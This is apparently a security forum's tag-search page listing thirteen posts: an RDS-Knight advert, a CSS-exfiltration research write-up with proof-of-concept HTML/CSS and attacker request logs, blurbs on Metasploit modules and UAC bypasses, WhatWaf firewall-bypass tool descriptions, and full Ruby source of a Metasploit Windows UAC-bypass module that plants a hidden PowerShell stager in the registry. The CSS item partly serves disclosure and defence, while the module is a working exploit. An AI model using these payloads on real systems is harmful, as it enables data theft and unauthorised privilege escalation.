Showing results for tags 'protection'.
Found 13 results

  1. Enterprise Remote Desktop Security. Intelligent Solutions for the Modern Workspace. Offices are decentralizing. Remote offices and mobile employees are at an all-time high. With the increased flexibility that comes with working in a remote environment, there are also increased risks. Malware and Ransomware run rampant on the internet. Login information is vulnerable. Strong passwords and careful users just aren't enough to ensure security anymore. RDS-Knight is the intelligent solution. With RDS-Knight, Administrators can use a wide array of flexible tools to control access to remote servers. Designed by security experts and updated regularly, RDS-Knight stays on the cutting edge of remote desktop security. With the recent update to Version 4.0, RDS-Knight continues to lead the way in bringing easy to manage, highly configurable security solutions to businesses around the world. [Hidden Content]
  2. 0x1

    CSS Exfil Protection

    Introducing CSS Exfil

    Several months ago I began tinkering with Chrome's XSS auditor looking for bypasses. One remote injection method which reliably got through Chrome's filter was CSS injection. By utilizing injected CSS, an attacker essentially has complete control over the look-and-feel of a page. I also discovered an attacker can leverage CSS to steal form data. By utilizing CSS alone, browser protections like NoScript can't block the egress of data (although NoScript's XSS auditor is more effective than Chrome at blocking some of the injection Proof of Concept attacks detailed below). While CSS injection is not a new vulnerability, using CSS as the sole attack vector to reliably exfiltrate data - to my knowledge - has never been presented. I am also not aware of any effective method previously documented to guard end users against such an attack - other than to block CSS, which is not a practical solution.

    Related Work

    The only mention I could find of a similar egress method is [Hidden Content], which demonstrates how CSS can be used to beacon an attacker when certain data is present on a web page. (Admittedly, I found this page later when researching possible mitigation techniques.) A couple of weeks ago I also became aware of a GitHub project dubbed [Hidden Content], which uses CSS to track web users.

    Methods of Exploitation

    There are a variety of attack scenarios which can leverage CSS Exfil, including:

      • Reflected or stored code injection flaws (e.g. any page vulnerable to XSS)
      • Hijacked or malicious 3rd party resources intentionally or accidentally included within the DOM (Document Object Model) of the target element, e.g.:
        • Web tracker snippets
        • Remarketing code
        • Advertisements which are not encapsulated within an iframe
        • Web development plugins/libraries/frameworks
      • Malicious or hijacked browser extensions

    Anatomy of the Attack

    The CSS Exfil attack centers around the CSS 'value selectors', which can be used to parse HTML tag attribute data. Here is a summary of these selectors:

      Selector             Example        Description
      [attribute=value]    [foo=bar]      Selects all elements with foo="bar"
      [attribute~=value]   [foo~=bar]     Selects all elements with a foo attribute containing the word "bar"
      [attribute|=value]   [foo|=bar]     Selects all elements with a foo attribute value starting with "bar"
      [attribute^=value]   [foo^="bar"]   Selects all elements with a foo attribute value starting with "bar"
      [attribute$=value]   [foo$="bar"]   Selects all elements with a foo attribute value ending with "bar"
      [attribute*=value]   [foo*="bar"]   Selects all elements with a foo attribute which contains the substring "bar"

    This simple example demonstrates how these selectors can be abused:

      <style>
      #username[value="mikeg"] { background:url("[Hidden Content]"); }
      </style>
      <input id="username" value="mikeg" />

    In the above example, when the HTML/CSS is rendered in a web browser, a background image is loaded from a remote host controlled by the attacker, indicating the value of the input is 'mikeg'. To make the attack more useful, additional text parsing is required. Below are several proof of concept exploits demonstrating the variety, scope, and severity of potential attacks.

    Proof of Concept

    Basic CSS Exfil example which shows how malicious CSS/HTML can be used to leak page data.

      <html>
      <head>
      <style>
      #username[value*="aa"]~#aa{background:url("[Hidden Content]");}
      #username[value*="ab"]~#ab{background:url("[Hidden Content]");}
      #username[value*="ac"]~#ac{background:url("[Hidden Content]");}
      #username[value^="a"]~#a_{background:url("[Hidden Content]_");}
      #username[value$="a"]~#_a{background:url("[Hidden Content]");}
      #username[value*="ba"]~#ba{background:url("[Hidden Content]");}
      #username[value*="bb"]~#bb{background:url("[Hidden Content]");}
      #username[value*="bc"]~#bc{background:url("[Hidden Content]");}
      #username[value^="b"]~#b_{background:url("[Hidden Content]_");}
      #username[value$="b"]~#_b{background:url("[Hidden Content]");}
      #username[value*="ca"]~#ca{background:url("[Hidden Content]");}
      #username[value*="cb"]~#cb{background:url("[Hidden Content]");}
      #username[value*="cc"]~#cc{background:url("[Hidden Content]");}
      #username[value^="c"]~#c_{background:url("[Hidden Content]_");}
      #username[value$="c"]~#_c{background:url("[Hidden Content]");}
      </style>
      </head>
      <body>
      <form>
      Username: <input type="text" id="username" name="username" value="<?php echo $_GET['username']; ?>" />
      <input id="form_submit" type="submit" value="submit"/>
      <!-- Sibling elements referenced by the ~ selectors above; each carries the background-image callback for one pattern -->
      <a id="aa"></a><a id="ab"></a><a id="ac"></a><a id="a_"></a><a id="_a"></a>
      <a id="ba"></a><a id="bb"></a><a id="bc"></a><a id="b_"></a><a id="_b"></a>
      <a id="ca"></a><a id="cb"></a><a id="cc"></a><a id="c_"></a><a id="_c"></a>
      </form>
      </body>
      </html>

    The above example isn't all that realistic but it demonstrates the fundamentals of the CSS Exfil attack. When a user enters any string consisting of the letters 'a', 'b', 'c', specific elements will be styled with a non-existent background image at a remote attacker URL. For the attack to succeed three conditions need to be in place:

      • Condition #1: The data being parsed must be present on page load
      • Condition #2: There must be one or more elements which can be referenced via a CSS selector relative to the data element
      • Condition #3: The element must be styled with a CSS property which takes a URL (e.g. background / background-image, list-style / list-style-image, or cursor)

    Upon visiting hxxps://victim[.]host/css-exfil-poc1[.]php?username=abcab, the attacker will receive data like this:

      127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /ab HTTP/1.1" 404 22
      127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /a_ HTTP/1.1" 404 22
      127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /bc HTTP/1.1" 404 22
      127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /_b HTTP/1.1" 404 22
      127.0.0.1 - - [25/Jan/2018:22:36:46 -0500] "GET /ca HTTP/1.1" 404 22

    Which can be re-assembled like this:

      a      # a_
      ab     # ab
      abc    # bc
      abca   # ca
      abcab  # _b

    The malicious CSS utilizes pattern matching for two character combinations ('aa', 'ab', 'ac'...) as well as detection of the first and last letter of the string ('a_' & '_a' callbacks). This method provides a reliable method of reconstructing data. The limitation is that repeating patterns may not always be apparent and reconstruction may sometimes require human intelligence if the data decodes to multiple strings.

    Why not use three character matching or longer? In a word: practicality. If the structure of the data can be anticipated it may be possible to use longer strings, which I will illustrate below. The more targeted the attack the more it becomes possible to make better data predictions and reduce the CSS footprint. But in general, the two-character first/last-character approach provides the best performance to attack footprint. All two letter English lower case alphabet permutations work out to P(26,2) = 650. Three character permutations increase the footprint to P(26,3) = 15,600, making it much more unlikely that Condition #2 will be possible. This table describes the attributes of various attack alphabets.

      Alphabet                                  Regex          Calculation          Required Elements   Estimated CSS Payload
      Numeric                                   [0-9]          P(10,2) + (10 * 2)   110                 7.7 KB
      Lowercase                                 [a-z]          P(26,2) + (26 * 2)   702                 49.14 KB
      Lower/uppercase                           [A-Za-z]       P(52,2) + (52 * 2)   2,756               192.92 KB
      Lower/uppercase / Numeric                 [A-Za-z0-9]    P(62,2) + (62 * 2)   3,906               273.42 KB
      Lower/uppercase / Numeric / 32 symbols                   P(94,2) + (92 * 2)   8,926               624.82 KB

    Depending where the targeted data element resides within a page, large alphabets may be possible without HTML injection. Running document.getElementsByTagName('*').length; in your browser console will display the total number of DOM (Document Object Model) elements on a page, which can provide an upper bound. For example, my homepage (at the time of this writing) has ~750 DOM elements in total. A test of Slashdot yielded ~2,100 elements and Google News yielded ~6,900 elements! That's not to say that each DOM element can be properly referenced by the target element, but it gives an upper bound on what may be possible without additional DOM injection.

    More info && Download [Hidden Content]
  3. This Metasploit module exploits a flaw where an authenticated user with permission to upload and manage media contents can upload various files on the server. The application prevents the user from uploading PHP code by checking the file extension. It uses a black-list based approach, as seen in octobercms/vendor/october/rain/src/Filesystem/ Definitions.php:blockedExtensions(). This module was tested on October CMS version 1.0.412 on Ubuntu. View the full article
  4. This Metasploit module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool is run with the "autoElevate" property set to true, however it can be moved to a new Windows directory containing a space (C:\Windows \System32\) where, upon execution, it will load our payload dll (propsys.dll). View the full article
  5. This Metasploit module exploits a flaw in the WSReset.exe file associated with the Windows Store. This binary has autoelevate privs, and it will run a binary file contained in a low-privilege registry location. By placing a link to the binary in the registry location, WSReset.exe will launch the binary as a privileged user. View the full article
  6. Microsoft Office365 and ProPlus build 16.0.11901.20204 suffers from code execution and protection bypass vulnerabilities. View the full article
  7. WhatWaf is an advanced firewall detection tool whose goal is to give you the idea of "There's a WAF?". WhatWaf works by detecting a firewall on a web application and attempting to detect a bypass (or two) for said firewall, on the specified target.

    Features

      • Ability to run on a single URL with the -u/--url flag
      • Ability to run through a list of URLs with the -l/--list flag
      • Ability to detect over 40 different firewalls
      • Ability to try over 20 different tampering techniques
      • Ability to pass your own payloads either from a file, from the terminal, or use the default payloads
      • Default payloads that are guaranteed to produce at least one WAF triggering
      • Ability to bypass firewalls using both SQLi techniques and cross-site scripting techniques
      • Ability to run behind multiple proxy types (socks4, socks5, http, https, and Tor)
      • Ability to use a random user agent, personal user agent, or custom default user agent
      • Auto-assign protocol to HTTP or ability to force protocol to HTTPS
      • A built-in encoder so you can encode your payloads into the discovered bypasses
      • More to come...

    Changelog v1.5.4

      • minor update to Cloudflare detection via issue #299

    [Hidden Content]
  8. There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control the user's environment variables, %windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. View the full article
  9. WhatWaf is an advanced firewall detection tool whose goal is to give you the idea of "There's a WAF?". WhatWaf works by detecting a firewall on a web application and attempting to detect a bypass (or two) for said firewall, on the specified target.

    Features

      • Ability to run on a single URL with the -u/--url flag
      • Ability to run through a list of URLs with the -l/--list flag
      • Ability to detect over 40 different firewalls
      • Ability to try over 20 different tampering techniques
      • Ability to pass your own payloads either from a file, from the terminal, or use the default payloads
      • Default payloads that are guaranteed to produce at least one WAF triggering
      • Ability to bypass firewalls using both SQLi techniques and cross-site scripting techniques
      • Ability to run behind multiple proxy types (socks4, socks5, http, https, and Tor)
      • Ability to use a random user agent, personal user agent, or custom default user agent
      • Auto-assign protocol to HTTP or ability to force protocol to HTTPS
      • A built-in encoder so you can encode your payloads into the discovered bypasses
      • More to come...

    [Hidden Content]
  10. This script is a proof of concept to bypass the Microsoft Windows User Access Control (UAC) via SluiFileHandlerHijackLPE. View the full article
  11. dEEpEst

    What Is the DDoS Protection Bootcamp?

    [Hidden Content]
  12. ##
    # This module requires Metasploit: [Hidden Content]
    # Current source: [Hidden Content]
    ##

    require 'msf/core/exploit/exe'
    require 'msf/core/exploit/powershell'

    class MetasploitModule < Msf::Exploit::Local
      Rank = ExcellentRanking

      include Exploit::Powershell
      include Post::Windows::Priv
      include Post::Windows::Registry
      include Post::Windows::Runas

      COMPUTERDEFAULT_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze
      COMPUTERDEFAULT_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze
      EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
      EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
      EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
      COMPUTERDEFAULT_PATH = "%WINDIR%\\System32\\computerdefault.exe".freeze
      CMD_MAX_LEN = 16383

      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Windows UAC Protection Bypass (Via ComputerDefault Registry Key)',
            'Description' => %q{
              This module will bypass Windows 10 UAC by hijacking a special key in the Registry
              under the current user hive, and inserting a custom command that will get invoked
              when the Windows computerdefault.exe application is launched. It will spawn a
              second shell that has the UAC flag turned off. This module modifies a registry key,
              but cleans up the key once the payload has been invoked. The module does not
              require the architecture of the payload to match the OS. If specifying EXE::Custom
              your DLL should call ExitProcess() after starting your payload in a separate process.
            },
            'License' => MSF_LICENSE,
            'Author' => [
              'St0rn - Synetis.com',        # UAC bypass discovery and research
              'St0rn - [email protected]', # MSF module
            ],
            'Platform' => ['win'],
            'SessionTypes' => ['meterpreter'],
            'Targets' => [
              [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
              [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
            ],
            'DefaultTarget' => 0,
            'References' => [
              [ 'URL', '[Hidden Content]' ]
            ],
            'DisclosureDate' => 'October 22 2018'
          )
        )
      end

      def check
        if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled?
          Exploit::CheckCode::Appears
        else
          Exploit::CheckCode::Safe
        end
      end

      def exploit
        commspec = '%COMSPEC%'
        registry_view = REGISTRY_VIEW_NATIVE
        psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"

        # Make sure we have a sane payload configuration
        if sysinfo['Architecture'] == ARCH_X64
          if session.arch == ARCH_X86
            # fodhelper.exe is x64 only exe
            commspec = '%WINDIR%\\Sysnative\\cmd.exe'
            if target_arch.first == ARCH_X64
              # We can't use absolute path here as
              # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
              psh_path = "powershell.exe"
            end
          end
          if target_arch.first == ARCH_X86
            # Invoking x86, so switch to SysWOW64
            psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
          end
        else
          # if we're on x86, we can't handle x64 payloads
          if target_arch.first == ARCH_X64
            fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
          end
        end

        if !payload.arch.empty? && (payload.arch.first != target_arch.first)
          fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
        end

        # Validate that we can actually do things before we bother
        # doing any more work
        check_permissions!

        case get_uac_level
        when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
             UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
             UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
          fail_with(Failure::NotVulnerable,
                    "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
        when UAC_DEFAULT
          print_good('UAC is set to Default')
          print_good('BypassUAC can bypass this setting, continuing...')
        when UAC_NO_PROMPT
          print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
          shell_execute_exe
          return
        end

        payload_value = rand_text_alpha(8)
        psh_path = expand_path(psh_path)

        template_path = Rex::Powershell::Templates::TEMPLATE_DIR
        psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)

        if psh_payload.length > CMD_MAX_LEN
          fail_with(Failure::None, "Payload size should be smaller than #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
        end

        psh_stager = "\"IEX (Get-ItemProperty -Path #{COMPUTERDEFAULT_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
        cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"

        existing = registry_getvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
        exist_delegate = !registry_getvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?

        if existing.empty?
          registry_createkey(COMPUTERDEFAULT_WRITE_KEY, registry_view)
        end

        print_status("Configuring payload and stager registry keys ...")
        unless exist_delegate
          registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
        end
        registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
        registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)

        # Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.
        cmd_path = expand_path(commspec)
        cmd_args = expand_path("/c #{COMPUTERDEFAULT_PATH}")
        print_status("Executing payload: #{cmd_path} #{cmd_args}")

        # We can't use cmd_exec here because it blocks, waiting for a result.
        client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })

        # Wait a couple of seconds to give the payload a chance to fire before cleaning up
        # TODO: fix this up to use something smarter than a timeout?
        Rex::sleep(5)
        handler(client)

        print_status("Cleaning up registry keys ...")
        unless exist_delegate
          registry_deleteval(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
        end
        if existing.empty?
          registry_deletekey(COMPUTERDEFAULT_DEL_KEY, registry_view)
        else
          registry_setvaldata(COMPUTERDEFAULT_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
        end
        registry_deleteval(COMPUTERDEFAULT_WRITE_KEY, payload_value, registry_view)
      end

      def check_permissions!
        fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

        # Check if you are an admin
        vprint_status('Checking admin status...')
        admin_group = is_in_admin_group?

        unless check == Exploit::CheckCode::Appears
          fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
        end

        unless is_in_admin_group?
          fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
        end

        print_status('UAC is Enabled, checking level...')
        if admin_group.nil?
          print_error('Either whoami is not there or failed to execute')
          print_error('Continuing under assumption you already checked...')
        else
          if admin_group
            print_good('Part of Administrators group! Continuing...')
          else
            fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
          end
        end

        if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
          fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
        end
      end
    end
  13. 1337day-Exploits

    Windows UAC Protection Bypass

    This Metasploit module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. View the full article